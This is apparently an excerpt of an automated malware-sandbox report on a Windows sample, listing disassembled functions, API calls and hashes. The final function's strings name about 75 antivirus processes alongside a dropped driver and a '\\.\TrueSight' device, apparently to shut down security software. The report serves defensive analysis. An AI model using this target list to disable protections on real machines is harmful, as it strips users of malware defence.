Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFDAC12E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFDAC12E473
WriteFile.KERNEL32 ref: 00007FFDAC12E73B
WriteFile.KERNEL32 ref: 00007FFDAC12E781
GetLastError.KERNEL32 ref: 00007FFDAC12E837

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: 2aea1e4cef9e43d02714ee127c774f7caaa0a09ada796455c465d94364bd6054
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: F2D10137B0AA8089E712CF65D4606EC37B5FB447E8B044236CEAD97B9ADE38D416C345

Function 00007FFDAC12ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC12ED07), ref: 00007FFDAC12EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDAC12ED07), ref: 00007FFDAC12EEC3

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 68833b262f3e0664e209536b8bf9aa74acd686c526724285b29c18ce2be5c37a
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 6B91E337B0A65186F7628F259460BBD2BA8BF04BE9F144139DE1E52786DF3CD442C70A

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFDAC122218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDAC122244
GetCurrentThreadId.KERNEL32 ref: 00007FFDAC122252
GetCurrentProcessId.KERNEL32 ref: 00007FFDAC12225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFDAC12226E

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: abc04364649ae2c7c6d1f508803935f436b1c85c8268a5d6276d2271f0e2f635
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 47115A22B15F018AEB40DF60E8642B833A4FB18BA8F040E31DA2D477A5DF3CD1A8C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFDAC125C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC125C2A

Strings

csm, xrefs: 00007FFDAC125DBE
csm, xrefs: 00007FFDAC125C4F

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: 77c2b84fda4cd26bb6374927c278043e3b455649b59e3d9b85a2231ca47e5f69
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 5671A53B70A6818ADB668B15D4A477DBBA0FB44BE8F048135DE4C47B8ACB3CD451C74A

Function 00007FFDAC126298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC126342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFDAC12636B

Strings

csm, xrefs: 00007FFDAC12646B

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: a4b853178705f8243eaf7c665b2eda7420b14a6a8fde23da546c7232194eeb1d
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 6E516F3B70A74586D621AF15E05036E77A8FB89BE0F500538EB8D07B96CF38E461CB46

Function 00007FFDAC12EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFDAC12EBA3
GetLastError.KERNEL32 ref: 00007FFDAC12EBC5

Strings

U, xrefs: 00007FFDAC12EB4F

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 905b56b4b375ad60ebe9f9382507423a5624880b07157a879be6694bfa094321
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: 85411323B1AA4182DB61CF25E4547AA77A4FB887E4F404031EE4E87789EF3CD401CB45

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFDAC130910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDAC123A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC123A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFDAC130993

Strings

csm, xrefs: 00007FFDAC13092B
f, xrefs: 00007FFDAC130925

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: af856ee72b87dd5698945aaeeac533042b04ddde63384012197f18a230ad9ccc
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 7411E137B19B8585E7519F22A0512A967A4EB44FE4F488035EE8C07B47CE38D852C708

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFDAC123990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC12112F), ref: 00007FFDAC1239E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC12112F), ref: 00007FFDAC123A21

Strings

csm, xrefs: 00007FFDAC123A0E

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: b6076e0ae4dea9b28a914b0904325f458172f935445a296f8a7cb74327e2b7fb
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: B0115B37709B8182EB628B19F45026977E4FB88B98F584230DE8D07B6ADF3CD551CB04

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: 4mPVjj.exePID: 1524, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	98.2%
Signature Coverage:	0%
Total number of Nodes:	55
Total number of Limit Nodes:	1

Executed Functions

Function 028318A0 Relevance: 96.5, Strings: 77, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LISFService.exe, xrefs: 02831B2D
AYAgent.aye, xrefs: 02831A86
D", xrefs: 02831E08
PSafeSysTray.exe, xrefs: 02831A0D
360Safe.exe, xrefs: 028318EA
BkavSystemServer.exe, xrefs: 02831B9D
wsctrlsvc.exe, xrefs: 02831B65
HipsMain.exe, xrefs: 028318C6
kscan.exe, xrefs: 0283193C
LnvSvcFdn.exe, xrefs: 02831B3B
avp.exe, xrefs: 02831A65
wsctrl11.exe, xrefs: 02831B57
HipsTray.exe, xrefs: 028318D2
QMDL.exe, xrefs: 0283197E
vsserv.exe, xrefs: 02831A18
QQRepair.exe, xrefs: 028319C0
avpui.exe, xrefs: 02831A70
LAVService.exe, xrefs: 02831B03
UnThreat.exe, xrefs: 028319EC
360tray.exe, xrefs: 028318F6
LenovoTray.exe, xrefs: 02831B11
QHActiveDefense.exe, xrefs: 02831C1B
QQPCTray.exe, xrefs: 028319B5
ZhuDongFangYu.exe, xrefs: 02831926
cefutil.exe, xrefs: 02831BF1
avgwdsvc.exe, xrefs: 02831A7B
QQPCPatch.exe, xrefs: 02831994
NisSrv.exe, xrefs: 0283191A
QQPCMgrUpdate.exe, xrefs: 028319CB
KvMonXP.exe, xrefs: 02831AD9
kwsprotect64.exe, xrefs: 02831947
wsctrl10.exe, xrefs: 02831B49
HipsDaemon.exe, xrefs: 028318DE
kxescore.exe, xrefs: 02831952
D", xrefs: 02831E55
knsdtray.exe, xrefs: 02831A5A
QHSafeTray.exe, xrefs: 02831C45
PromoUtil.exe, xrefs: 02831C0D
QMPersonalCenter.exe, xrefs: 02831989
QQPCRealTimeSpeedup.exe, xrefs: 0283199F
SecurityHealthSystray.exe, xrefs: 02831931
mpcopyaccelerator.exe, xrefs: 028319E1
BkavSystemService64.exe, xrefs: 02831BB9
ksetupwiz.exe, xrefs: 02831973
QHWatchdog.exe, xrefs: 02831C53
mssecess.exe, xrefs: 02831AAF
BkavUtil.exe, xrefs: 02831BC7
RavMonD.exe, xrefs: 02831ACB
C:\Windows\System32\drivers\189atohci.sys, xrefs: 02831CF5, 02831D0E, 02831D21, 02831D3C, 02831D53
MsMpEng.exe, xrefs: 0283190E
kxemain.exe, xrefs: 02831968
TMBMSRV.exe, xrefs: 02831A4F
kxetray.exe, xrefs: 0283195D
baiduSafeTray.exe, xrefs: 02831AE7
\\.\TrueSight, xrefs: 02831D6B
BaiduSd.exe, xrefs: 02831AF5
PopWndLog.exe, xrefs: 02831BFF
KSafeTray.exe, xrefs: 028319D6
ad-watch.exe, xrefs: 02831A02
360sd.exe, xrefs: 02831902
BluProService.exe, xrefs: 02831BE3
ashDisp.exe, xrefs: 02831A39
QQPCRTP.exe, xrefs: 028319AA
QHSafeScanner.exe, xrefs: 02831C37
rtvscan.exe, xrefs: 02831A2E
LenovoPcManagerService.exe, xrefs: 02831B1F
K7TSecurity.exe, xrefs: 028319F7
BkavSystemService.exe, xrefs: 02831BAB
avcenter.exe, xrefs: 02831A44
BLuPro.exe, xrefs: 02831BD5
V3Svc.exe, xrefs: 02831A96
remupd.exe, xrefs: 02831A23
QHSafeMain.exe, xrefs: 02831C29
QUHLPSVC.EXE, xrefs: 02831ABD
BkavService.exe, xrefs: 02831B8F
Bka.exe, xrefs: 02831B81
wsctrl.exe, xrefs: 02831B73

Memory Dump Source

Source File: 00000006.00000002.3377097034.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000006.00000002.3377076364.0000000002830000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377124309.0000000002848000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377150150.0000000002854000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377172422.0000000002856000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377191741.0000000002858000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377227045.000000000288C000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377253099.0000000002892000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3377396175.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2830000_4mPVjj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 360Safe.exe$360sd.exe$360tray.exe$AYAgent.aye$BLuPro.exe$BaiduSd.exe$Bka.exe$BkavService.exe$BkavSystemServer.exe$BkavSystemService.exe$BkavSystemService64.exe$BkavUtil.exe$BluProService.exe$C:\Windows\System32\drivers\189atohci.sys$D"$D"$HipsDaemon.exe$HipsMain.exe$HipsTray.exe$K7TSecurity.exe$KSafeTray.exe$KvMonXP.exe$LAVService.exe$LISFService.exe$LenovoPcManagerService.exe$LenovoTray.exe$LnvSvcFdn.exe$MsMpEng.exe$NisSrv.exe$PSafeSysTray.exe$PopWndLog.exe$PromoUtil.exe$QHActiveDefense.exe$QHSafeMain.exe$QHSafeScanner.exe$QHSafeTray.exe$QHWatchdog.exe$QMDL.exe$QMPersonalCenter.exe$QQPCMgrUpdate.exe$QQPCPatch.exe$QQPCRTP.exe$QQPCRealTimeSpeedup.exe$QQPCTray.exe$QQRepair.exe$QUHLPSVC.EXE$RavMonD.exe$SecurityHealthSystray.exe$TMBMSRV.exe$UnThreat.exe$V3Svc.exe$ZhuDongFangYu.exe$\\.\TrueSight$ad-watch.exe$ashDisp.exe$avcenter.exe$avgwdsvc.exe$avp.exe$avpui.e